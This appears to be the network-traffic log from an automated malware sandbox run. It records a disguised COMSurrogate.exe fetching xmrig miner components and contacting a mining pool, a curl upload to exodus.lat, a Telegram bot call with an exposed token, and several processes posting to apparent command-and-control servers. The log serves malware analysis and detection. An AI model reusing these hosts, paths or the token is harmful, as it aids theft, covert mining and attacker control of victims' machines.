                                  Age: 2286
                                  Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
                                  Content-Type: application/pkix-crl
                                  Vary: Accept-Encoding
                                • flag-gb
                                  GET
                                  http://c.pki.goog/r/r4.crl
                                  Remote address:
                                  142.250.200.35:80
                                  Request
                                  GET /r/r4.crl HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Microsoft-CryptoAPI/10.0
                                  Host: c.pki.goog
                                  Response
                                  HTTP/1.1 200 OK
                                  Accept-Ranges: bytes
                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                  Cross-Origin-Resource-Policy: cross-origin
                                  Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                  Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                  Content-Length: 436
                                  X-Content-Type-Options: nosniff
                                  Server: sffe
                                  X-XSS-Protection: 0
                                  Date: Fri, 06 Dec 2024 01:35:55 GMT
                                  Expires: Fri, 06 Dec 2024 02:25:55 GMT
                                  Cache-Control: public, max-age=3000
                                  Age: 2524
                                  Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                  Content-Type: application/pkix-crl
                                  Vary: Accept-Encoding
                                • flag-us
                                  DNS
                                  152.74.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  152.74.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  cdn-downloads.com
                                  COMSurrogate.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  cdn-downloads.com
                                  IN A
                                  Response
                                  cdn-downloads.com
                                  IN A
                                  203.161.45.11
                                • flag-nl
                                  GET
                                  https://cdn-downloads.com/files/mi.exe
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/mi.exe HTTP/1.1
                                  Host: cdn-downloads.com
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/x-msdownload
                                  last-modified: Tue, 03 Dec 2024 03:05:09 GMT
                                  accept-ranges: bytes
                                  content-length: 6412800
                                  date: Fri, 06 Dec 2024 02:18:01 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-nl
                                  GET
                                  https://cdn-downloads.com/files/config.json
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/config.json HTTP/1.1
                                  Host: cdn-downloads.com
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/json
                                  last-modified: Tue, 03 Dec 2024 03:05:09 GMT
                                  accept-ranges: bytes
                                  content-length: 2049
                                  date: Fri, 06 Dec 2024 02:18:04 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-nl
                                  GET
                                  https://cdn-downloads.com/files/WinRing0x64.sys
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/WinRing0x64.sys HTTP/1.1
                                  Host: cdn-downloads.com
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/octet-stream
                                  last-modified: Tue, 03 Dec 2024 03:05:09 GMT
                                  accept-ranges: bytes
                                  content-length: 14544
                                  date: Fri, 06 Dec 2024 02:18:04 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-nl
                                  GET
                                  https://cdn-downloads.com/files/SHA256SUMS
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/SHA256SUMS HTTP/1.1
                                  Host: cdn-downloads.com
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  last-modified: Tue, 03 Dec 2024 03:05:09 GMT
                                  accept-ranges: bytes
                                  content-length: 256
                                  date: Fri, 06 Dec 2024 02:18:04 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-nl
                                  GET
                                  https://cdn-downloads.com/files/xmrig-cuda.dll
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/xmrig-cuda.dll HTTP/1.1
                                  Host: cdn-downloads.com
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/x-msdownload
                                  last-modified: Tue, 03 Dec 2024 03:05:09 GMT
                                  accept-ranges: bytes
                                  content-length: 32908288
                                  date: Fri, 06 Dec 2024 02:18:05 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-nl
                                  GET
                                  https://cdn-downloads.com/files/nvrtc64_102_0.dll
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/nvrtc64_102_0.dll HTTP/1.1
                                  Host: cdn-downloads.com
                                • flag-nl
                                  GET
                                  https://cdn-downloads.com/files/nvrtc-builtins64_102.dll
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/nvrtc-builtins64_102.dll HTTP/1.1
                                  Host: cdn-downloads.com
                                • flag-nl
                                  POST
                                  https://exodus.lat/files/upload.php
                                  curl.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  POST /files/upload.php HTTP/1.1
                                  Host: exodus.lat
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Content-Length: 1746
                                  Expect: 100-continue
                                  Content-Type: multipart/form-data; boundary=------------------------e7f4cb1975d40687
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  x-powered-by: PHP/7.4.33
                                  content-type: text/html; charset=UTF-8
                                  content-length: 85
                                  date: Fri, 06 Dec 2024 02:18:02 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-us
                                  DNS
                                  r11.o.lencr.org
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r11.o.lencr.org
                                  IN A
                                  Response
                                  r11.o.lencr.org
                                  IN CNAME
                                  o.lencr.edgesuite.net
                                  o.lencr.edgesuite.net
                                  IN CNAME
                                  a1887.dscq.akamai.net
                                  a1887.dscq.akamai.net
                                  IN A
                                  88.221.135.106
                                  a1887.dscq.akamai.net
                                  IN A
                                  88.221.135.113
                                • flag-gb
                                  GET
                                  http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOYNUtL7HcF2OF3Zxn9WfNDZg%3D%3D
                                  Remote address:
                                  88.221.135.106:80
                                  Request
                                  GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOYNUtL7HcF2OF3Zxn9WfNDZg%3D%3D HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Microsoft-CryptoAPI/10.0
                                  Host: r11.o.lencr.org
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx
                                  Content-Type: application/ocsp-response
                                  Content-Length: 504
                                  ETag: "E970140DF7BE26B726C80651588A42F2B4806633592AD5D71420ACB9E1EBF4FC"
                                  Last-Modified: Thu, 05 Dec 2024 00:36:00 UTC
                                  Cache-Control: public, no-transform, must-revalidate, max-age=16413
                                  Expires: Fri, 06 Dec 2024 06:51:35 GMT
                                  Date: Fri, 06 Dec 2024 02:18:02 GMT
                                  Connection: keep-alive
                                • flag-us
                                  DNS
                                  168.245.100.95.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  168.245.100.95.in-addr.arpa
                                  IN PTR
                                  Response
                                  168.245.100.95.in-addr.arpa
                                  IN PTR
                                  a95-100-245-168deploystaticakamaitechnologiescom
                                • flag-us
                                  DNS
                                  106.135.221.88.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  106.135.221.88.in-addr.arpa
                                  IN PTR
                                  Response
                                  106.135.221.88.in-addr.arpa
                                  IN PTR
                                  a88-221-135-106deploystaticakamaitechnologiescom
                                • flag-us
                                  DNS
                                  location.services.mozilla.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  location.services.mozilla.com
                                  IN A
                                  Response
                                  location.services.mozilla.com
                                  IN CNAME
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  IN A
                                  35.190.72.216
                                • flag-us
                                  DNS
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN A
                                  Response
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN A
                                  35.244.181.201
                                • flag-us
                                  DNS
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN A
                                  Response
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN A
                                  35.244.181.201
                                • flag-us
                                  GET
                                  https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                                  firefox.exe
                                  Remote address:
                                  35.190.72.216:443
                                  Request
                                  GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/2.0
                                  host: location.services.mozilla.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: */*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  content-type: application/json
                                  te: trailers
                                • flag-us
                                  DNS
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  IN A
                                  35.190.72.216
                                • flag-us
                                  DNS
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  201.181.244.35.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  201.181.244.35.in-addr.arpa
                                  IN PTR
                                  Response
                                  201.181.244.35.in-addr.arpa
                                  IN PTR
                                  20118124435bcgoogleusercontentcom
                                • flag-us
                                  DNS
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  ciscobinary.openh264.org
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  ciscobinary.openh264.org
                                  IN A
                                  Response
                                  ciscobinary.openh264.org
                                  IN CNAME
                                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                  IN CNAME
                                  a17.rackcdn.com
                                  a17.rackcdn.com
                                  IN CNAME
                                  a17.rackcdn.com.mdc.edgesuite.net
                                  a17.rackcdn.com.mdc.edgesuite.net
                                  IN CNAME
                                  a19.dscg10.akamai.net
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.209
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.155
                                • flag-us
                                  DNS
                                  ciscobinary.openh264.org
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  ciscobinary.openh264.org
                                  IN A
                                  Response
                                  ciscobinary.openh264.org
                                  IN CNAME
                                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                  IN CNAME
                                  a17.rackcdn.com
                                  a17.rackcdn.com
                                  IN CNAME
                                  a17.rackcdn.com.mdc.edgesuite.net
                                  a17.rackcdn.com.mdc.edgesuite.net
                                  IN CNAME
                                  a19.dscg10.akamai.net
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.209
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.155
                                • flag-us
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN A
                                  Response
                                  redirector.gvt1.com
                                  IN A
                                  142.250.187.206
                                • flag-gb
                                  GET
                                  https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                                  firefox.exe
                                  Remote address:
                                  142.250.187.206:443
                                  Request
                                  GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
                                  host: redirector.gvt1.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: */*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  te: trailers
                                • flag-us
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN A
                                  Response
                                  redirector.gvt1.com
                                  IN A
                                  142.250.187.206
                                • flag-us
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN A
                                  Response
                                  redirector.gvt1.com
                                  IN A
                                  142.250.187.206
                                • flag-gb
                                  GET
                                  http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                                  firefox.exe
                                  Remote address:
                                  88.221.134.209:80
                                  Request
                                  GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
                                  Host: ciscobinary.openh264.org
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  Accept: */*
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  Connection: keep-alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Last-Modified: Fri, 08 Nov 2024 02:37:54 GMT
                                  ETag: 09372174e83dbbf696ee732fd2e875bb
                                  Content-Length: 491284
                                  Accept-Ranges: bytes
                                  X-Timestamp: 1731033473.13891
                                  Content-Type: application/zip
                                  X-Trans-Id: txe2d6fd5524464f55a6fac-00673047f0dfw1
                                  Cache-Control: public, max-age=79381
                                  Expires: Sat, 07 Dec 2024 00:21:14 GMT
                                  Date: Fri, 06 Dec 2024 02:18:13 GMT
                                  Connection: keep-alive
                                • flag-us
                                  DNS
                                  a19.dscg10.akamai.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  a19.dscg10.akamai.net
                                  IN A
                                  Response
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.209
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.155
                                • flag-us
                                  DNS
                                  a19.dscg10.akamai.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  a19.dscg10.akamai.net
                                  IN A
                                  Response
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.209
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.155
                                • flag-us
                                  DNS
                                  a19.dscg10.akamai.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  a19.dscg10.akamai.net
                                  IN AAAA
                                  Response
                                  a19.dscg10.akamai.net
                                  IN AAAA
                                  2a02:26f0:a1::58dd:869b
                                  a19.dscg10.akamai.net
                                  IN AAAA
                                  2a02:26f0:a1::58dd:86d1
                                • flag-us
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN AAAA
                                  Response
                                  redirector.gvt1.com
                                  IN AAAA
                                  2a00:1450:4009:81f::200e
                                • flag-us
                                  DNS
                                  r4---sn-aigzrnsz.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4---sn-aigzrnsz.gvt1.com
                                  IN A
                                  Response
                                  r4---sn-aigzrnsz.gvt1.com
                                  IN CNAME
                                  r4.sn-aigzrnsz.gvt1.com
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN A
                                  74.125.175.169
                                • flag-gb
                                  GET
                                  https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733451493,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733451136&mv=m&mvi=4&pl=25&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  74.125.175.169:443
                                  Request
                                  GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733451493,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733451136&mv=m&mvi=4&pl=25&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com HTTP/1.1
                                  Host: r4---sn-aigzrnsz.gvt1.com
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  Accept: */*
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate, br
                                  Connection: keep-alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Accept-Ranges: bytes
                                  Cache-Control: public,max-age=86400
                                  Content-Disposition: attachment
                                  Content-Length: 14485862
                                  Content-Security-Policy: default-src 'none'
                                  Content-Type: application/zip
                                  Etag: "1d3918c"
                                  Server: downloads
                                  X-Content-Type-Options: nosniff
                                  X-Frame-Options: SAMEORIGIN
                                  X-Xss-Protection: 0
                                  Date: Thu, 05 Dec 2024 12:44:59 GMT
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
                                  Connection: keep-alive
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                                  Vary: Origin
                                • flag-us
                                  DNS
                                  r4.sn-aigzrnsz.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN A
                                  Response
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN A
                                  74.125.175.169
                                • flag-us
                                  DNS
                                  r4.sn-aigzrnsz.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN AAAA
                                  Response
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN AAAA
                                  2a00:1450:4009:1b::9
                                • flag-us
                                  DNS
                                  r4.sn-aigzrnsz.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN AAAA
                                  Response
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN AAAA
                                  2a00:1450:4009:1b::9
                                • flag-us
                                  DNS
                                  216.72.190.35.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  216.72.190.35.in-addr.arpa
                                  IN PTR
                                  Response
                                  216.72.190.35.in-addr.arpa
                                  IN PTR
                                  2167219035bcgoogleusercontentcom
                                • flag-us
                                  DNS
                                  31.243.111.52.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  31.243.111.52.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  209.134.221.88.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  209.134.221.88.in-addr.arpa
                                  IN PTR
                                  Response
                                  209.134.221.88.in-addr.arpa
                                  IN PTR
                                  a88-221-134-209deploystaticakamaitechnologiescom
                                • flag-us
                                  DNS
                                  169.175.125.74.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  169.175.125.74.in-addr.arpa
                                  IN PTR
                                  Response
                                  169.175.125.74.in-addr.arpa
                                  IN PTR
                                  lhr48s34-in-f91e100net
                                • flag-us
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN A
                                • flag-us
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN A
                                  Response
                                  play.google.com
                                  IN A
                                  142.250.179.238
                                • flag-us
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN AAAA
                                  Response
                                  play.google.com
                                  IN AAAA
                                  2a00:1450:4009:81d::200e
                                • flag-us
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN AAAA
                                  Response
                                  play.google.com
                                  IN AAAA
                                  2a00:1450:4009:81d::200e
                                • flag-us
                                  DNS
                                  238.179.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  238.179.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  238.179.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s31-in-f141e100net
                                • flag-us
                                  DNS
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.149.100.209
                                • flag-us
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  api.telegram.org
                                  COMSurrogate.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  api.telegram.org
                                  IN A
                                  Response
                                  api.telegram.org
                                  IN A
                                  149.154.167.220
                                • flag-nl
                                  POST
                                  https://api.telegram.org/bot7859424075:AAH6p20Kp3COdNOyzKY7oNWwCIVNCkgfzac/sendMessage
                                  COMSurrogate.exe
                                  Remote address:
                                  149.154.167.220:443
                                  Request
                                  POST /bot7859424075:AAH6p20Kp3COdNOyzKY7oNWwCIVNCkgfzac/sendMessage HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: api.telegram.org
                                  Content-Length: 58
                                  Expect: 100-continue
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Fri, 06 Dec 2024 02:18:34 GMT
                                  Content-Type: application/json
                                  Content-Length: 289
                                  Connection: keep-alive
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                • flag-us
                                  DNS
                                  pool.hashvault.pro
                                  mi.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  pool.hashvault.pro
                                  IN A
                                  Response
                                  pool.hashvault.pro
                                  IN A
                                  95.179.241.203
                                • flag-us
                                  DNS
                                  220.167.154.149.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  220.167.154.149.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  203.241.179.95.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  203.241.179.95.in-addr.arpa
                                  IN PTR
                                  Response
                                  203.241.179.95.in-addr.arpa
                                  IN PTR
                                  95179241203vultrusercontentcom
                                • flag-us
                                  DNS
                                  203.241.179.95.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  203.241.179.95.in-addr.arpa
                                  IN PTR
                                  Response
                                  203.241.179.95.in-addr.arpa
                                  IN PTR
                                  95179241203vultrusercontentcom
                                • flag-ru
                                  GET
                                  https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa158305633775b0e650fdba1e9c95b1c92975ccf55bc592fa5a818ece02a1b7e2984c57cad7021ddd372118d73788
                                  rafencoder.exe
                                  Remote address:
                                  188.119.66.185:443
                                  Request
                                  GET /ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa158305633775b0e650fdba1e9c95b1c92975ccf55bc592fa5a818ece02a1b7e2984c57cad7021ddd372118d73788 HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                  Host: 188.119.66.185
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:18:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Powered-By: PHP/7.4.33
                                • flag-ru
                                  GET
                                  https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b92a8dcd6c946a4ebd42809e7c4ce718c34f7f637df3b70caaf94cda91a6967478d3f44cc588fa45d7d69e43faeaa5960502d18f414ad332231ad03489d5d69359
                                  rafencoder.exe
                                  Remote address:
                                  188.119.66.185:443
                                  Request
                                  GET /ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b92a8dcd6c946a4ebd42809e7c4ce718c34f7f637df3b70caaf94cda91a6967478d3f44cc588fa45d7d69e43faeaa5960502d18f414ad332231ad03489d5d69359 HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                  Host: 188.119.66.185
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:19:01 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Powered-By: PHP/7.4.33
                                • flag-us
                                  DNS
                                  185.66.119.188.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  185.66.119.188.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  233.38.18.104.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  233.38.18.104.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  23.149.64.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  23.149.64.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  206.157.214.31.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  206.157.214.31.in-addr.arpa
                                  IN PTR
                                  Response
                                  206.157.214.31.in-addr.arpa
                                  IN PTR
                                  mailwillionebizua
                                • flag-us
                                  DNS
                                  206.157.214.31.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  206.157.214.31.in-addr.arpa
                                  IN PTR
                                  Response
                                  206.157.214.31.in-addr.arpa
                                  IN PTR
                                  mailwillionebizua
                                • 172.67.165.166:443
                                  https://atten-supporse.biz/api
                                  tls, http
                                  2M4078.exe
                                  1.0kB
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://atten-supporse.biz/api

                                  HTTP Response

                                  200
                                • 104.21.81.153:443
                                  https://se-blurry.biz/api
                                  tls, http
                                  2M4078.exe
                                  995 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://se-blurry.biz/api

                                  HTTP Response

                                  200
                                • 185.215.113.43:80
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  http
                                  skotes.exe
                                  2.9kB
                                  3.4kB
                                  23
                                  16

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

